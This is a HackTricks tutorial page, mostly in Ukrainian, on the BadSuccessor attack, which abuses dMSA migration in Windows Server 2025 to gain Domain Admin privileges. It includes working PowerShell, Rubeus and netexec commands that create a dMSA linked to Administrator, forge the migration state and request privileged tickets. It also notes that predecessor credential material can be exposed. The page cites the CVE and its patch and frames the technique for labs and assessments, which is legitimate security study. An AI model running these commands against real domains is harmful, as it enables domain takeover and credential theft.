BadSuccessor
Tip
Вчіться та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вчіться та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Перегляньте повний каталог HackTricks Training для assessment tracks (ARTA/GRTA/AzRTA) і Linux Hacking Expert (LHE).
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 Discord group, telegram group, слідкуйте за @hacktricks_live на X/Twitter, або перегляньте сторінку LinkedIn і YouTube channel.
- Діліться hacking tricks, надсилаючи PRs до репозиторіїв github HackTricks і HackTricks Cloud.
Overview
BadSuccessor зловживає робочим процесом міграції delegated Managed Service Account (dMSA), який було представлено у Windows Server 2025. dMSA можна прив’язати до застарілого облікового запису через msDS-ManagedAccountPrecededByLink і перевести через стани міграції, що зберігаються в msDS-DelegatedMSAState. Якщо атакувальник може створити dMSA у writable OU і контролювати ці атрибути, KDC може видати квитки для керованого атакувальником dMSA з authorization context прив’язаного облікового запису.
На практиці це означає, що малопривілейований користувач, який має лише delegated OU rights, може створити новий dMSA, вказати його на Administrator, завершити стан міграції, а потім отримати TGT, чий PAC містить привілейовані групи, такі як Domain Admins.
dMSA migration details that matter
- dMSA is a Windows Server 2025 feature.
Start-ADServiceAccountMigrationвстановлює міграцію в стан started.Complete-ADServiceAccountMigrationвстановлює міграцію в стан completed.msDS-DelegatedMSAState = 1означає, що міграцію розпочато.msDS-DelegatedMSAState = 2означає, що міграцію завершено.- Під час легітимної міграції dMSA має прозоро замінити обліковий запис, що був витіснений, тому KDC/LSA зберігають доступ, який уже мав попередній обліковий запис.
Microsoft Learn також зазначає, що під час міграції оригінальний обліковий запис прив’язується до dMSA, і dMSA призначений отримувати доступ до того, до чого міг отримати доступ старий обліковий запис. Це і є припущення щодо безпеки, яким зловживає BadSuccessor.
Requirements
- Домен, де dMSA exists, що означає наявність підтримки Windows Server 2025 на стороні AD.
- Атакувальник може create об’єкти
msDS-DelegatedManagedServiceAccountу певному OU або має еквівалентні широкі права на створення дочірніх об’єктів там. - Атакувальник може write відповідні атрибути dMSA або повністю контролює dMSA, який щойно створив.
- Атакувальник може запитувати Kerberos tickets з доменно-joined контексту або через tunnel, який має доступ до LDAP/Kerberos.
Practical checks
Найчистіший операторський сигнал — перевірити рівень domain/forest і переконатися, що середовище вже використовує новий Server 2025 stack:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Якщо ви бачите значення на кшталт Windows2025Domain і Windows2025Forest, розглядайте BadSuccessor / dMSA migration abuse як пріоритетну перевірку.
Ви також можете перерахувати writable OUs, делеговані для створення dMSA, за допомогою public tooling:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Abuse flow
- Створіть dMSA в OU, де у вас є делеговані права create-child.
- Встановіть
msDS-ManagedAccountPrecededByLinkна DN привілейованої цілі, наприкладCN=Administrator,CN=Users,DC=corp,DC=local. - Встановіть
msDS-DelegatedMSAStateна2, щоб позначити міграцію як завершену. - Запросіть TGT для нового dMSA та використайте повернутий ticket для доступу до привілейованих services.
PowerShell example:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Приклади запитів на квитки / operational tooling:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Чому це більше, ніж privilege escalation
Під час легітимної міграції Windows також потрібно, щоб новий dMSA обробляв tickets, які були видані для попереднього account до cutover. Саме тому dMSA-related ticket material може включати current і previous keys у потоці KERB-DMSA-KEY-PACKAGE.
Для підробленої міграції під контролем attacker таку поведінку можна перетворити на:
- Privilege escalation шляхом успадкування privileged group SIDs у PAC.
- Credential material exposure тому що обробка previous-key може розкривати material, еквівалентний RC4/NT hash попередника, у вразливих workflows.
Це робить technique корисною і для прямого domain takeover, і для подальших операцій, таких як pass-the-hash або ширший credential compromise.
Примітки щодо patch status
Початкова поведінка BadSuccessor не є лише теоретичною проблемою preview 2025 року. Microsoft присвоїла їй CVE-2025-53779 і опублікувала security update у August 2025. Зберігайте цей attack у документації для:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- validation of OU delegations and dMSA exposure during assessments
Не припускайте, що domain на Windows Server 2025 вразливий лише тому, що існує dMSA; перевіряйте patch level і тестуйте обережно.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Вчіться та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вчіться та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Перегляньте повний каталог HackTricks Training для assessment tracks (ARTA/GRTA/AzRTA) і Linux Hacking Expert (LHE).
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 Discord group, telegram group, слідкуйте за @hacktricks_live на X/Twitter, або перегляньте сторінку LinkedIn і YouTube channel.
- Діліться hacking tricks, надсилаючи PRs до репозиторіїв github HackTricks і HackTricks Cloud.


